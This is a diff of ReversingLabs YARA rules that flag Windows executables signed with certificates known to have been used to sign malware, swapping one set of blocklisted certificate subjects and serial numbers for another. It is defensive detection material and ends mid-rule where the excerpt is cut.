@@ -19757,21 +42151,21 @@ rule REVERSINGLABS_Cert_Blocklist_0108Cbaee60728F5Bf06E45A56D6F170 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE6\\xAD\\xA6\\xE6\\xB1\\x89\\xE4\\xB8\\x9C\\xE6\\xB9\\x96\\xE6\\x96\\xB0\\xE6\\x8A\\x80\\xE6\\x9C\\xAF\\xE5\\xBC\\x80\\xE5\\x8F\\x91\\xE5\\x8C\\xBA" and pe.signatures [ i ] . serial == "01:08:cb:ae:e6:07:28:f5:bf:06:e4:5a:56:d6:f1:70" and 1605680260 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AFVIMPEX SRL" and pe.signatures [ i ] . serial == "7d:f2:df:ed:47:c6:fd:65:42:13:18:47:cf:fb:c1:02" and 1567036800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_038D56A12153E8B5C74C69Bff65Cbe3F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_74Fedf0F8398060Fa8378C6D174465C8 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "48162554-a95b-5cd3-9bbb-bcf6a1d96592"
+		id = "eea46214-d0f5-5e92-b678-4a1df09025ce"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9384-L9400"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3378-L3394"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ed3a81231f93f9d2ae462481503ba37072c3800dd1379baae11737f093a27af1"
+		logic_hash = "406821c7990f05fdad91704f6418304f53dd4800bc4b41912177a1695858fade"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19781,21 +42175,21 @@ rule REVERSINGLABS_Cert_Blocklist_038D56A12153E8B5C74C69Bff65Cbe3F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE6\\xAD\\xA6\\xE6\\xB1\\x89\\xE5\\x86\\x85\\xE7\\x91\\x9F\\xE6\\x96\\xAF\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "03:8d:56:a1:21:53:e8:b5:c7:4c:69:bf:f6:5c:be:3f" and 1605680260 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DOCS PTY LTD" and pe.signatures [ i ] . serial == "74:fe:df:0f:83:98:06:0f:a8:37:8c:6d:17:44:65:c8" and 1566172800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_060D94E2Ccae84536654D9Daf39Fef1E : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_3Bd6A5Bba28E7C1Ca44880159Dace237 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ac5d29ef-fd52-536b-bcbc-44433dda8a21"
+		id = "c80245bd-908a-5b89-92e3-af0dd7bed63a"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9402-L9418"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3396-L3412"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "49000f3a3ce1ad9aef87162d7527b8f062e0aa12276b82c7335f0ccc14b7d38a"
+		logic_hash = "f885c782148947d09133a3cc65319e02204c21d6c6d911b360840f25f37601dc"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19805,21 +42199,21 @@ rule REVERSINGLABS_Cert_Blocklist_060D94E2Ccae84536654D9Daf39Fef1E : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HasCred ApS" and pe.signatures [ i ] . serial == "06:0d:94:e2:cc:ae:84:53:66:54:d9:da:f3:9f:ef:1e" and 1627948800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TECHNO BEAVERS LIMITED" and pe.signatures [ i ] . serial == "3b:d6:a5:bb:a2:8e:7c:1c:a4:48:80:15:9d:ac:e2:37" and 1563408000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0Bc9B800F480691Bd6B60963466B0C75 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_C04F8F1E00C69E96A51Bf14Aab1C6Ae0 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "614f88ca-183a-548b-99f1-30cf4c4027ce"
+		id = "6513160e-ece5-500b-8b0b-4b8a6e04c0af"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9420-L9436"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3414-L3432"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "6a498fd30c611976e9aad2f9b85b13c3c29246582cdfefc800615db88e40dac2"
+		logic_hash = "c2b5ffa305b761b57dd91c0acea0d8f82bec6b7d3608be10a20ea63621f3f3e8"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19829,21 +42223,21 @@ rule REVERSINGLABS_Cert_Blocklist_0Bc9B800F480691Bd6B60963466B0C75 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HasCred ApS" and pe.signatures [ i ] . serial == "0b:c9:b8:00:f4:80:69:1b:d6:b6:09:63:46:6b:0c:75" and 1629158400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CHAIKA, TOV" and ( pe.signatures [ i ] . serial == "00:c0:4f:8f:1e:00:c6:9e:96:a5:1b:f1:4a:ab:1c:6a:e0" or pe.signatures [ i ] . serial == "c0:4f:8f:1e:00:c6:9e:96:a5:1b:f1:4a:ab:1c:6a:e0" ) and 1551398400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0C4324Ff41F0A7B16Ffcc93Dffa8Fa99 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_23F537Ce13C6Cccdfd3F8Ce81Fb981Cb : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "34594a57-f9fd-5b9d-afb6-691be33da9b5"
+		id = "f48b7818-5b34-5609-822a-39a2e7fb44c5"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9438-L9454"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3434-L3450"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d3ce83fb0497c533a5474d46300c341677ec243686723783798bfbaec4f6e369"
+		logic_hash = "d347bce3eddd0cac276a7504955f0342ae44fd93d238e514af5b1fdc208b68fc"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19853,21 +42247,21 @@ rule REVERSINGLABS_Cert_Blocklist_0C4324Ff41F0A7B16Ffcc93Dffa8Fa99 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE7\\xA6\\x8F\\xE5\\xBB\\xBA\\xE7\\x9C\\x81\\xE4\\xBA\\x94\\xE6\\x98\\x9F\\xE4\\xBF\\xA1\\xE6\\x81\\xAF\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "0c:43:24:ff:41:f0:a7:b1:6f:fc:c9:3d:ff:a8:fa:99" and 1600300800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ISECURE GROUP PTY LTD" and pe.signatures [ i ] . serial == "23:f5:37:ce:13:c6:cc:cd:fd:3f:8c:e8:1f:b9:81:cb" and 1566086400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0B980Fc8783E4F158E41829Ab21Bab81 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_73Ecfdbb99Aec176Ddfcf7958D120E1A : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f7358f71-421f-57fa-abdf-ab479f4b7007"
+		id = "84e20878-e4ea-53a5-9c1b-04f3c66276de"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9456-L9472"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3452-L3468"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "b0f43caec1cfc5b2d1512d7fcf0bcf1e02fc81764b4376b081f38c4de328eab2"
+		logic_hash = "d911156707cef97acf79c096b5d4a4db166ddf05237168f1ecffb0c0a2ebd8fa"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19877,21 +42271,21 @@ rule REVERSINGLABS_Cert_Blocklist_0B980Fc8783E4F158E41829Ab21Bab81 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Idris Kanchwala Holding Corp." and pe.signatures [ i ] . serial == "0b:98:0f:c8:78:3e:4f:15:8e:41:82:9a:b2:1b:ab:81" and 1631750400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MHOW PTY LTD" and pe.signatures [ i ] . serial == "73:ec:fd:bb:99:ae:c1:76:dd:fc:f7:95:8d:12:0e:1a" and 1566864000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_D8F515715Aeffef0A0E4E37F16C254Fa : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_675129Bb174A5B05E330Cc09F8Bbd70A : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "50ffd0a0-d861-53d7-a7dc-f74ccc49eff8"
+		id = "97046206-efc4-58dd-a9df-4966bad3902d"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9474-L9492"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3470-L3486"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "3c7d57a655f76a6e5ef6b0e770db7c91d0830b6b0b37caef5ef9e3e78ad1fd75"
+		logic_hash = "d989ea5233e8a64bffa0e29645c3458ef1f5173158ced7814c3b473b92ef49f4"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19901,21 +42295,21 @@ rule REVERSINGLABS_Cert_Blocklist_D8F515715Aeffef0A0E4E37F16C254Fa : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HOLDING LA LTD" and ( pe.signatures [ i ] . serial == "00:d8:f5:15:71:5a:ef:fe:f0:a0:e4:e3:7f:16:c2:54:fa" or pe.signatures [ i ] . serial == "d8:f5:15:71:5a:ef:fe:f0:a0:e4:e3:7f:16:c2:54:fa" ) and 1619136000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALEX & CO PTY LIMITED" and pe.signatures [ i ] . serial == "67:51:29:bb:17:4a:5b:05:e3:30:cc:09:f8:bb:d7:0a" and 1565568000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_D79739187C585E453C00Afc11D77B523 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_De13Fe2Dbb8F890287E1780Aff6Ffd22 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ed427336-6833-5e09-8ebe-039c8cd50846"
+		id = "d2b15920-76ae-54e4-988c-278a3622ec52"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9494-L9512"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3488-L3504"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "6d6db87227d7be559afa67c4f2b65b01f26741fdf337d920241a633bb036426f"
+		logic_hash = "ebd983bcfa1e5d54af9d9e07d80d05f4752040eab92e63cd986db789fa07026f"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19925,21 +42319,21 @@ rule REVERSINGLABS_Cert_Blocklist_D79739187C585E453C00Afc11D77B523 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SAN MARINO INVESTMENTS PTY LTD" and ( pe.signatures [ i ] . serial == "00:d7:97:39:18:7c:58:5e:45:3c:00:af:c1:1d:77:b5:23" or pe.signatures [ i ] . serial == "d7:97:39:18:7c:58:5e:45:3c:00:af:c1:1d:77:b5:23" ) and 1631059200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LAST TIME PTY LTD" and pe.signatures [ i ] . serial == "de:13:fe:2d:bb:8f:89:02:87:e1:78:0a:ff:6f:fd:22" and 1566259200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_961Cecb0227845317549E9343A980E91 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Da000D18949C247D4Ddfc2585Cc8Bd0F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f319592a-5f08-5f2c-b840-5f897695e054"
+		id = "3e939b73-abe4-5941-93ab-18bcde854aaf"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9514-L9532"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3506-L3524"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "c74512e95e2d6aedecb1dbd30fac6fde40d1e9520c89b785519694d9bc9ba854"
+		logic_hash = "3453f13e633a2c233f78d0389c655bb5304e567407b3e0c5c47e5e7127c345ca"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19949,21 +42343,21 @@ rule REVERSINGLABS_Cert_Blocklist_961Cecb0227845317549E9343A980E91 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AmiraCo Oy" and ( pe.signatures [ i ] . serial == "00:96:1c:ec:b0:22:78:45:31:75:49:e9:34:3a:98:0e:91" or pe.signatures [ i ] . serial == "96:1c:ec:b0:22:78:45:31:75:49:e9:34:3a:98:0e:91" ) and 1615248000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PORT-SERVIS LTD" and ( pe.signatures [ i ] . serial == "00:da:00:0d:18:94:9c:24:7d:4d:df:c2:58:5c:c8:bd:0f" or pe.signatures [ i ] . serial == "da:00:0d:18:94:9c:24:7d:4d:df:c2:58:5c:c8:bd:0f" ) and 1564444800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_1Ef6392B2993A6F67578299659467Ea8 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_06E842D3Ea6249D783D6B55E29C060C7 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "123e5aed-0ef4-5146-81bb-5d455a9cf92e"
+		id = "37829f07-c569-5e46-8b7a-2137c4c801e8"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9534-L9550"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3526-L3542"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f6b454a575ea7635d5edebffe3c9c83e95312ee33245e733987532348258733e"
+		logic_hash = "9f71de0119527c8580f9e47e3fba07242814c5a537d727d4541fd7a802b0cb86"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19973,21 +42367,21 @@ rule REVERSINGLABS_Cert_Blocklist_1Ef6392B2993A6F67578299659467Ea8 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALUSEN d. o. o." and pe.signatures [ i ] . serial == "1e:f6:39:2b:29:93:a6:f6:75:78:29:96:59:46:7e:a8" and 1618531200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PORT-SERVIS LTD, TOV" and pe.signatures [ i ] . serial == "06:e8:42:d3:ea:62:49:d7:83:d6:b5:5e:29:c0:60:c7" and 1565568000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_A918455C0D4Da7Ca474F41F11A7Cf38C : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_06473C3C19D9E1A9429B58B6Faec2967 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "959b10fe-fbd0-5642-a5d9-4ac2e0474666"
+		id = "01eba681-8c98-5553-b369-941b6dba11e2"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9552-L9570"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3544-L3560"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ea30d85c057f9363ce29d4c024097c50a8752dd2095481181322fe5d5c92bb4b"
+		logic_hash = "f9ca49ce65d213dce803806956c0ce1da0c4068bea173daae9cb06dab0a86268"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19997,21 +42391,21 @@ rule REVERSINGLABS_Cert_Blocklist_A918455C0D4Da7Ca474F41F11A7Cf38C : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MIDDRA INTERNATIONAL CORP." and ( pe.signatures [ i ] . serial == "00:a9:18:45:5c:0d:4d:a7:ca:47:4f:41:f1:1a:7c:f3:8c" or pe.signatures [ i ] . serial == "a9:18:45:5c:0d:4d:a7:ca:47:4f:41:f1:1a:7c:f3:8c" ) and 1618963200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Digital Leadership Solutions Limited" and pe.signatures [ i ] . serial == "06:47:3c:3c:19:d9:e1:a9:42:9b:58:b6:fa:ec:29:67" and 1581984001 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_936Bc256D2057Ca9B9Ec3034C3Ed0Ee6 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_39F56251Df2088223Cc03494084E6081 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4dbe7db7-2f61-558c-a6dc-875ba87322c7"
+		id = "0c475e89-9729-53b9-a301-7a9faa0fef91"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9572-L9590"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3562-L3578"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "7e90c29bcfe4632e70b61a0cf2ab48a3de986bd5c6c730f64a363f4f3d79a3f4"
+		logic_hash = "c87850f91758a5bb3bdf6f6d7de9a3f53077d64cebdde541ac0742d3cea4f4e0"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20021,21 +42415,21 @@ rule REVERSINGLABS_Cert_Blocklist_936Bc256D2057Ca9B9Ec3034C3Ed0Ee6 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SALES & MAINTENANCE LIMITED" and ( pe.signatures [ i ] . serial == "00:93:6b:c2:56:d2:05:7c:a9:b9:ec:30:34:c3:ed:0e:e6" or pe.signatures [ i ] . serial == "93:6b:c2:56:d2:05:7c:a9:b9:ec:30:34:c3:ed:0e:e6" ) and 1616889600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Inter Med Pty. Ltd." and pe.signatures [ i ] . serial == "39:f5:62:51:df:20:88:22:3c:c0:34:94:08:4e:60:81" and 1583539200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Afe8Fee94B41422E01E4897Bcd52D0A4 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_1362E56D34Dc7B501E17Fa1Ac3C3E3D9 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "83d08ca6-2a0b-5da3-8d53-7bf8bcc361cf"
+		id = "9dccd009-eca1-5f21-b5ef-1a75f9d93c7d"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9592-L9610"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3580-L3596"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "02c55b182bc9843334baed9c0a7cca2c88cd1de00ca9b47b10ec79b7a5acf9bb"
+		logic_hash = "0415c5a49076bab23dfc29ef2d6168b93d6bfde07a89ccb0368d2c967422407a"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20045,21 +42439,21 @@ rule REVERSINGLABS_Cert_Blocklist_Afe8Fee94B41422E01E4897Bcd52D0A4 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TLGM ApS" and ( pe.signatures [ i ] . serial == "00:af:e8:fe:e9:4b:41:42:2e:01:e4:89:7b:cd:52:d0:a4" or pe.signatures [ i ] . serial == "af:e8:fe:e9:4b:41:42:2e:01:e4:89:7b:cd:52:d0:a4" ) and 1617062400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO  \"Amaranth\"" and pe.signatures [ i ] . serial == "13:62:e5:6d:34:dc:7b:50:1e:17:fa:1a:c3:c3:e3:d9" and 1575936000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_718E89Ddb33257Ea77Ba74Be7F2Baf1D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4B83593Fc78D92Cfaa9Bdf3F97383964 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d173c2b2-2b76-521a-aac1-ae69fdf5b16b"
+		id = "8b5a8a8e-16f5-5098-83e5-72820f4f548a"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9612-L9628"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3598-L3614"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2f0defa1e1d905d937677e96f2a0955d9737f6976596932cc093fdecfea3fdb0"
+		logic_hash = "775e41fc102cbaeb9374984380b0e073de2a0075b9a200f8ab644bd1369ba015"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20069,21 +42463,21 @@ rule REVERSINGLABS_Cert_Blocklist_718E89Ddb33257Ea77Ba74Be7F2Baf1D : INFO FILE
 		importance = 25
 
 	condition:
